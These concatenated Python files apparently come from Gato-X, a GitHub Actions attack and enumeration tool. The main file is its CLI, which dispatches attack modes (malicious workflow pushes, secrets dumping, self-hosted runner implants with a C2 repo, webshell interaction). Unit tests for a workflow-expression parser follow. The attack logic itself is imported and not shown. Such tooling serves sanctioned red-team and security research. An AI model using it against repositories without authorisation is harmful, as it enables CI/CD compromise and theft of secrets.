    )

    assert "continue-on-error: true" in workflow
    assert "powershell" in workflow



import argparse
import os
import re

from colorama import Fore, Style

from gatox import util
from gatox.cli.colors import RED_DASH
from gatox.cli.output import Output, SPLASH
from gatox.cli.enumeration.config import configure_parser_enumerate
from gatox.cli.search.config import configure_parser_search
from gatox.cli.attack.config import configure_parser_attack
from gatox.enumerate.enumerate import Enumerator
from gatox.attack.attack import Attacker
from gatox.attack.runner.webshell import WebShell
from gatox.attack.secrets.secrets_attack import SecretsAttack
from gatox.search.search import Searcher
from gatox.models.execution import Execution


def cli(args):
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        description=(
            f"{Fore.YELLOW}This tool requires a GitHub PAT to"
            f" function!{Style.RESET_ALL}\n\nThis can be passed via the"
            ' "GH_TOKEN" environment variable, or if it is not set,\nthen the'
            " application will prompt you for one."
        ),
    )

    subparsers = parser.add_subparsers(dest="command", required=True)

    configure_parser_general(parser)

    parser.add_argument(
        "--api-url",
        "-u",
        help=(
            f"{Fore.RED}{Output.bright('!! Experimental !!')}\n"
            "Github API URL to target. \n"
            "Defaults to 'https://api.github.com'"
        ),
        metavar="https://api.github-url.com/api/v3",
        required=False,
    )

    attack_parser = subparsers.add_parser(
        "attack",
        help="CI/CD Attack Capabilities",
        aliases=["a"],
        formatter_class=argparse.RawTextHelpFormatter,
    )
    attack_parser.set_defaults(func=attack)

    enumerate_parser = subparsers.add_parser(
        "enumerate",
        help="Enumeration Capabilities",
        aliases=["enum", "e"],
        formatter_class=argparse.RawTextHelpFormatter,
    )
    enumerate_parser.set_defaults(func=enumerate)

    search_parser = subparsers.add_parser(
        "search",
        help="Search Capabilities Using GitHub's API",
        aliases=["s"],
        formatter_class=argparse.RawTextHelpFormatter,
    )
    search_parser.set_defaults(func=search)

    configure_parser_attack(attack_parser)
    configure_parser_enumerate(enumerate_parser)
    configure_parser_search(search_parser)

    arguments = parser.parse_args(args)

    Output(not arguments.no_color)
    validate_arguments(arguments, parser)
    print(Output.blue(SPLASH))

    arguments.func(arguments, subparsers)


def validate_arguments(args, parser):
    if "GH_TOKEN" not in os.environ:
        gh_token = input(
            "No 'GH_TOKEN' environment variable set! Please enter a GitHub" " PAT.\n"
        )
    else:
        gh_token = os.environ["GH_TOKEN"]

    if "github_pat_" in gh_token:
        parser.error(f"{Fore.RED}[!] Fine-grained PATs are currently not supported!")

    if not (
        re.match("gh[po]_[A-Za-z0-9]{36}$", gh_token)
        or re.match("^[a-fA-F0-9]{40}$", gh_token)
    ):
        if re.match("gh[s]_[A-Za-z0-9]{36}$", gh_token):
            if not (args.machine and args.repository):
                parser.error(
                    f"{Fore.RED}[!]{Style.RESET_ALL} Gato-X does"
                    " not support App tokens without machine flag."
                )
            else:
                Output.info(
                    "Allowing the use of a GitHub App token for single repo enumeration."
                )
        else:
            parser.error(
                f"{Fore.RED}[!]{Style.RESET_ALL} Provided GitHub PAT is malformed or unsupported!"
            )

    args_dict = vars(args)
    args_dict["gh_token"] = gh_token

    if args.socks_proxy and args.http_proxy:
        parser.error(
            f"{Fore.RED}[-]{Style.RESET_ALL} You cannot use a SOCKS and HTTP"
            " proxy at the same time!"
        )


def attack(args, parser):
    parser = parser.choices["attack"]

    if not args.target and not (args.interact or args.payload_only):
        parser.error(
            f"{Fore.RED}[!] You must select a target unless you are interacting with an implant or generating payloads!"
        )

    if not (
        args.workflow
        or args.runner_on_runner
        or args.secrets
        or args.interact
        or args.payload_only
    ):
        parser.error(
            f"{Fore.RED}[!] You must select one of the attack modes, "
            "workflow, runner_on_runner, secrets, or interact."
        )

    if args.custom_file and (args.command or args.name):
        parser.error(
            f"{Fore.RED}[!] A shell command or workflow name"
            f" cannot be used with a custom workflow."
        )

    if args.secrets and args.command:
        parser.error(f"{Fore.RED}[!] A command cannot be used with secrets exfil!.")

    if args.runner_on_runner and args.command:
        parser.error(
            f"{Fore.RED}[!] A command cannot be used with runner-on-runner attacks!."
        )

    if not args.custom_file:
        args.command = args.command if args.command else "whoami"
        args.name = args.name if args.name else "test"

    if args.runner_on_runner and not (args.target_os or args.target_arch):
        parser.error(
            f"{Fore.RED}[!] You must specify a target OS and architecture for runner-on-runner attacks!"
        )

    if args.payload_only and not (args.target_os or args.target_arch):
        parser.error(
            f"{Fore.RED}[!] You must specify a target OS, architecture, and C2 Repo for runner-on-runner payload generation!"
        )

    if args.runner_on_runner:
        if (
            args.target_os == "windows" or args.target_os == "osx"
        ) and args.target_arch == "arm":
            parser.error(
                f"{Fore.RED}[!] Windows and OSX do not support arm32 architecture!"
            )

    timeout = int(args.timeout)

    if args.runner_on_runner or args.payload_only or args.interact:
        if not args.branch:
            args.branch = "main"

        gh_attack_runner = WebShell(
            args.gh_token,
            author_email=args.author_email,
            author_name=args.author_name,
            socks_proxy=args.socks_proxy,
            http_proxy=args.http_proxy,
            timeout=timeout,
            github_url=args.api_url,
        )

        if args.payload_only:

            gh_attack_runner.payload_only(
                args.target_os,
                args.target_arch,
                args.labels,
                c2_repo=args.c2_repo,
                keep_alive=args.keep_alive,
            )
        elif args.runner_on_runner:
            gh_attack_runner.runner_on_runner(
                args.target,
                args.branch,
                args.pr_title,
                args.source_branch,
                args.message,
                args.target_os,
                args.target_arch,
                args.labels,
                keep_alive=args.keep_alive,
                yaml_name=args.file_name,
                run_name=args.name,
                workflow_name=args.name,
                c2_repo=args.c2_repo,
            )
        elif args.interact:
            if args.c2_repo:
                gh_attack_runner.interact_webshell(args.c2_repo)
            else:
                parser.error(
                    f"{Fore.RED}[!] You must specify a C2 repo to interact with!"
                )

    elif args.workflow:
        gh_attack_runner = Attacker(
            args.gh_token,
            author_email=args.author_email,
            author_name=args.author_name,
            socks_proxy=args.socks_proxy,
            http_proxy=args.http_proxy,
            timeout=timeout,
            github_url=args.api_url,
        )
        gh_attack_runner.push_workflow_attack(
            args.target,
            args.command,
            args.custom_file,
            args.branch,
            args.message,
            args.delete_run,
            args.file_name,
        )
    elif args.secrets:

        gh_attack_runner = SecretsAttack(
            args.gh_token,
            author_email=args.author_email,
            author_name=args.author_name,
            socks_proxy=args.socks_proxy,
            http_proxy=args.http_proxy,
            timeout=timeout,
            github_url=args.api_url,
        )

        gh_attack_runner.secrets_dump(
            args.target, args.branch, args.message, args.delete_run, args.file_name
        )


def enumerate(args, parser):
    parser = parser.choices["enumerate"]

    if not (
        args.target
        or args.self_enumeration
        or args.repository
        or args.repositories
        or args.validate
    ):
        parser.error(
            f"{Fore.RED}[-]{Style.RESET_ALL} No enumeration type was" " specified!"
        )

    if (
        sum(
            bool(x)
            for x in [
                args.target,
                args.self_enumeration,
                args.repository,
                args.repositories,
                args.validate,
            ]
        )
        != 1
    ):
        parser.error(
            f"{Fore.RED}[-]{Style.RESET_ALL} You must only select one "
            "enumeration type."
        )

    gh_enumeration_runner = Enumerator(
        args.gh_token,
        socks_proxy=args.socks_proxy,
        http_proxy=args.http_proxy,
        output_yaml=args.output_yaml,
        skip_log=args.skip_runners,
        github_url=args.api_url,
    )

    exec_wrapper = Execution()
    orgs = []
    repos = []

    if args.validate:
        orgs = gh_enumeration_runner.validate_only()
    elif args.self_enumeration:
        orgs, repos = gh_enumeration_runner.self_enumeration()
    elif args.target:
        # First, determine if the target is an organization or a repository.
        if gh_enumeration_runner.api.get_user_type(args.target) == "Organization":
            orgs = [gh_enumeration_runner.enumerate_organization(args.target)]
        else:
            # Otherwise, simply enumerate all repositories belonging to the user.
            repos = gh_enumeration_runner.enumerate_user(args.target)
    elif args.repositories:
        try:
            repo_list = util.read_file_and_validate_lines(
                args.repositories, r"[A-Za-z0-9-_.]+\/[A-Za-z0-9-_.]+"
            )
            repos = gh_enumeration_runner.enumerate_repos(repo_list)
        except argparse.ArgumentError as e:
            parser.error(
                f"{RED_DASH} The file contained an invalid repository name!"
                f"{Output.bright(e)}"
            )
    elif args.repository:
        repos = gh_enumeration_runner.enumerate_repos([args.repository])

    exec_wrapper.set_user_details(gh_enumeration_runner.user_perms)
    exec_wrapper.add_organizations(orgs)
    exec_wrapper.add_repositories(repos)

    if args.output_json:
        Output.write_json(exec_wrapper, args.output_json)


def search(args, parser):
    parser = parser.choices["search"]

    gh_search_runner = Searcher(
        args.gh_token,
        socks_proxy=args.socks_proxy,
        http_proxy=args.http_proxy,
        github_url=args.api_url,
    )
    if args.sourcegraph:
        if args.query and args.target:
            parser.error(
                f"{Fore.RED}[-]{Style.RESET_ALL} You cannot select an organization "
                "with a custom query!"
            )

        results = gh_search_runner.use_sourcegraph_api(
            organization=args.target, query=args.query
        )
    else:
        if not (args.query or args.target):
            parser.error(
                f"{Fore.RED}[-]{Style.RESET_ALL} You must select an organization "
                "or pass a custom query!."
            )
        if args.query:
            results = gh_search_runner.use_search_api(
                organization=args.target, query=args.query
            )
        else:
            results = gh_search_runner.use_search_api(organization=args.target)

    if results:
        gh_search_runner.present_results(results, args.output_text)


def configure_parser_general(parser):
    """Helper method to add arguments to all subarguments.

    Args:
        parser: The parser to add the arguments to.
    """
    parser.add_argument(
        "--socks-proxy",
        "-sp",
        help=(
            "SOCKS proxy to use for requests, in"
            f" {Fore.GREEN}HOST{Style.RESET_ALL}:{Fore.GREEN}PORT"
            f" {Style.RESET_ALL}format"
        ),
        required=False,
    )

    parser.add_argument(
        "--http-proxy",
        "-p",
        help=(
            "HTTPS proxy to use for requests, in"
            f" {Fore.GREEN}HOST{Style.RESET_ALL}:{Fore.GREEN}PORT"
            f" {Style.RESET_ALL}format."
        ),
        required=False,
    )

    parser.add_argument(
        "--no-color", "-nc", help="Removes all color from output.", action="store_true"
    )



from gatox.workflow_parser.expression_parser import ExpressionParser
from gatox.workflow_parser.expression_evaluator import ExpressionEvaluator


def test_parse1():
    if_check1 = "(((github.event.action == 'labeled' && (github.event.label.name == 'approved' || github.event.label.name == 'lgtm' || github.event.label.name == 'ok-to-test')) || (github.event.action != 'labeled' && (contains(github.event.pull_request.labels.*.name, 'ok-to-test') || contains(github.event.pull_request.labels.*.name, 'approved') || contains(github.event.pull_request.labels.*.name, 'lgtm')))) && github.repository == 'feast-dev/feast')"

    expr = ExpressionParser(if_check1)

    expr.print_ast()


def test_parse2():
    if_check = "github.event.issue.pull_request\n&& contains(github.event.comment.body, '[test]')\n&& contains(fromJson('[\"OWNER\", \"MEMBER\"]'), github.event.comment.author_association)\n"

    expr = ExpressionParser(if_check)
    expr.print_ast()
    variables = {
        "github.event.issue.pull_request": True,
        "github.event.comment.body": "[test] testing",
        "github.event.comment.author_association": "NONE",
    }

    evaluator = ExpressionEvaluator(variables)
    result = evaluator.evaluate(expr.get_node())

    print(f"Result of the expression '{if_check}' is: {result}")

    assert result is False


def test_simple_evaluate():
    # Example usage:
    variables = {"github.event.issue.pull_request": True}
    expression = "github.event.issue.pull_request"
    parser = ExpressionParser(expression)
    ast_root = parser.get_node()

    evaluator = ExpressionEvaluator(variables)
    result = evaluator.evaluate(ast_root)
    print(f"Result of the expression '{expression}' is: {result}")
    assert result is True
